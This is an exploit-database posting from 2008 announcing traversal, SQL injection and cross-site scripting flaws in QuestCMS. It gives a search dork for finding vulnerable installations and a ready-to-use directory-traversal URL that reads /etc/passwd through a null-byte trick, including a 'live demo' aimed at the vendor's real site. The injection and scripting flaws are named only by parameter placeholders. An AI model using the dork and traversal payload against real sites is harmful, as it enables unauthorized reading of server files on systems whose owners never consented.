QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection



EKU-ID: 14727 CVE: OSVDB-49414;CVE-2008-4774;OSVDB-49413;CVE-2008-4773;OSVDB-49412;CVE-2008-4772 OSVDB-ID:
Author: d3b4g Published: 2008-10-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


--------------------------------------------------------------------------------

Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]

--------------------------------------------------------------------------------
#Author: d3b4g


#contact: bl4ckend[at]gmail[dot]com

--------------------------------------------------------------------------------
Affected software:
--------------------------------------------------------------------------------
Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------

dork        : allinurl:"/questcms/"
--------------------------------------------------------------------------------
Directory traversal vulnibility
=============================
Exploit     : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html

Live demo   : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html


---------------------------------------------------------------------------------

sql injection:
==============
Vuln file:questcms/main/main.php?obj=[sql]


XSS:
====
exploit:/main/main.php?cx=[Xss]
--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

greetz:

All my friends,milw0rm...

--------------------------------------------------------------------------------



--------------------------------- [ www.hotlism.org ] --------------------------------------

# milw0rm.com [2008-10-27]